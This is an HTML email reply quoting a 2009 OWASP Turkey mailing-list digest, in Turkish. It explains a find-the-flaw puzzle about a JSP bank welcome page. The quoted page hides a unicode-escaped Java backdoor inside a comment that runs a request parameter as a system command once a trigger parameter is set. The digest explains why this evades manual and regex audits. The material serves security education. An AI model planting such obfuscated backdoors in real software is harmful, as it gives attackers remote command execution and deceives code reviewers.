insanın ufkunu açan bir şey. Teşekkürler.<br><br><div dir="ltr"><div><span style="font-weight: bold;">Oğuzhan YILMAZ</span></div></div><br><br><div class="gmail_quote">20 Ekim 2009 19:00 tarihinde  <span dir="ltr">&lt;<a href="mailto:owasp-turkey-request@lists.owasp.org">owasp-turkey-request@lists.owasp.org</a>&gt;</span> yazdı:<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Send Owasp-turkey mailing list submissions to<br>
        <a href="mailto:owasp-turkey@lists.owasp.org">owasp-turkey@lists.owasp.org</a><br>
<br>
To subscribe or unsubscribe via the World Wide Web, visit<br>
        <a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
or, via email, send a message with subject or body &#39;help&#39; to<br>
        <a href="mailto:owasp-turkey-request@lists.owasp.org">owasp-turkey-request@lists.owasp.org</a><br>
<br>
You can reach the person managing the list at<br>
        <a href="mailto:owasp-turkey-owner@lists.owasp.org">owasp-turkey-owner@lists.owasp.org</a><br>
<br>
When replying, please edit your Subject line so it is more specific<br>
than &quot;Re: Contents of Owasp-turkey digest...&quot;<br>
<br>
<br>
Today&#39;s Topics:<br>
<br>
   1. Re: Ar?zay? Bul #4 (Bedirhan Urgun)<br>
<br>
<br>
----------------------------------------------------------------------<br>
<br>
Message: 1<br>
Date: Tue, 20 Oct 2009 18:38:07 +0300<br>
From: Bedirhan Urgun &lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;<br>
Subject: Re: [Owasp-turkey] Ar?zay? Bul #4<br>
To: OWASP-T?rkiye &lt;<a href="mailto:owasp-turkey@lists.owasp.org">owasp-turkey@lists.owasp.org</a>&gt;<br>
Message-ID:<br>
        &lt;<a href="mailto:297cff690910200838q3a62d820oa1b91f630755ef86@mail.gmail.com">297cff690910200838q3a62d820oa1b91f630755ef86@mail.gmail.com</a>&gt;<br>
Content-Type: text/plain; charset=&quot;utf-8&quot;<br>
<br>
digerlerine daha gore daha ilgi ceker dedim ama...  :)) cekmedi<br>
<br>
cevap &quot;herkes developer&#39;lara guveniyor ama uretimin canina okuyabilirler&quot;<br>
mantigi ile yazilmis bir backdoor. Java belirli bir formatta (\uxxxx)<br>
unicode karakterler ile kod yazilmasina imkan taniyor. Yani butun<br>
identifier, keyword, operator v.b.&#39;lerin ascii olmasina gerek yok. (C# icin<br>
ise boyle bir kisitlama var yani keyword ve operator&#39;ler icin mesela sadece<br>
ascii karakterler kullanilabiliyor.). Kisacasi verdigim JSP icerisindeki<br>
unicode formatinda yazilan bolumu, basina ve sonuna &#39; karakteri koyduktan<br>
sonra<br>
<br>
<a href="http://www.webguvenligi.org/ipacker/ipacker.html" target="_blank">http://www.webguvenligi.org/ipacker/ipacker.html</a><br>
<br>
uygulamasinin INPUT bolumune koyup EVAL TO OUTPUT butonuna basarsaniz,<br>
aslinda developer&#39;in nasil bir backdoor yazdigini gorebilirsiniz. Ortaya<br>
cikan parca, multiline comment bolumunu kapatip, asil backdoor kodunu yazip,<br>
daha sonra tekrar multiline comment bolumunu aciyor (ki &quot;syntax error&quot;<br>
almayalim, ayni sqli, ldapi gibi).<br>
<br>
Bu sekilde ciplak gozle bakan veya regex ile audit yapmaya calisan bir<br>
denetimcinin isi zorlasiyor.<br>
<br>
bedirhan<br>
<br>
18 Ekim 2009 21:05 tarihinde Bedirhan Urgun &lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt; yazd?:<br>
<br>
&gt;<br>
&gt; Bu kez eglenceli bir ariza var :) Ise farkli bir perspektiften bakmayi<br>
&gt; gerektiriyor. Bir JSP sayfasi...<br>
&gt;<br>
&gt; bedirhan<br>
&gt;<br>
&gt; Arizayi Bul #4<br>
&gt; --------------------<br>
&gt;<br>
&gt; &lt;%@page &lt;%25@page&gt; contentType=&quot;text/html&quot; pageEncoding=&quot;UTF-8&quot;%&gt;<br>
&gt; &lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;<br>
&gt;    &quot;<a href="http://www.w3.org/TR/html4/loose.dtd" target="_blank">http://www.w3.org/TR/html4/loose.dtd</a>&quot;&gt;<br>
&gt; &lt;html&gt;<br>
&gt;     &lt;head&gt;<br>
&gt;         &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;<br>
&gt;         &lt;title&gt;BankHorizon Welcome Page&lt;/title&gt;<br>
&gt;         &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;style.css&quot; /&gt;<br>
&gt;     &lt;/head&gt;<br>
&gt;     &lt;body&gt;<br>
&gt;         &lt;% /* Include the header page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;header.jsp&quot; /&gt;<br>
&gt;         &lt;% /* Include the menu page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;menu.jsp&quot; /&gt;<br>
&gt;         &lt;% /* Include the footer menu left page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;footer_menu_left.jsp&quot; /&gt;<br>
&gt;         &lt;h2&gt;&lt;/h2&gt;<br>
&gt;         &lt;jsp:include page=&quot;data_validation.jsp&quot; /&gt;<br>
&gt;         &lt;%<br>
&gt;             /************************************COMMENT<br>
&gt; BEGIN**************************************<br>
&gt;            This is unicode that will be used for data validation<br>
&gt;<br>
&gt; \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a<br>

&gt;             *************************************COMMENT<br>
&gt; END***********************************/<br>
&gt;             String lang = request.getParameter(&quot;language&quot;);<br>
&gt;             // use the unicode above to validate the data<br>
&gt;             validateUnicode(lang);<br>
&gt;         %&gt;<br>
&gt;         &lt;br/&gt;<br>
&gt;         &lt;% /* Include the footer bottom page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;footer_bottom.jsp&quot; /&gt;<br>
&gt;     &lt;/body&gt;<br>
&gt; &lt;/html&gt;<br>
&gt;<br>
<br>
<br>
<br>
--<br>
Bedirhan Urgun<br>
<a href="http://www.webguvenligi.org" target="_blank">http://www.webguvenligi.org</a><br>
<a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>
<br>
T?rk?e Web Uygulama G?venli?i E-Posta Listesine ?ye olmak i?in:<br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
-------------- next part --------------<br>
An HTML attachment was scrubbed...<br>
URL: <a href="https://lists.owasp.org/pipermail/owasp-turkey/attachments/20091020/a678bcf7/attachment-0001.html" target="_blank">https://lists.owasp.org/pipermail/owasp-turkey/attachments/20091020/a678bcf7/attachment-0001.html</a><br>

<br>
------------------------------<br>
<br>
_______________________________________________<br>
Owasp-turkey mailing list<br>
<a href="mailto:Owasp-turkey@lists.owasp.org">Owasp-turkey@lists.owasp.org</a><br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
<br>
<br>
End of Owasp-turkey Digest, Vol 31, Issue 22<br>
********************************************<br>
</blockquote></div><br>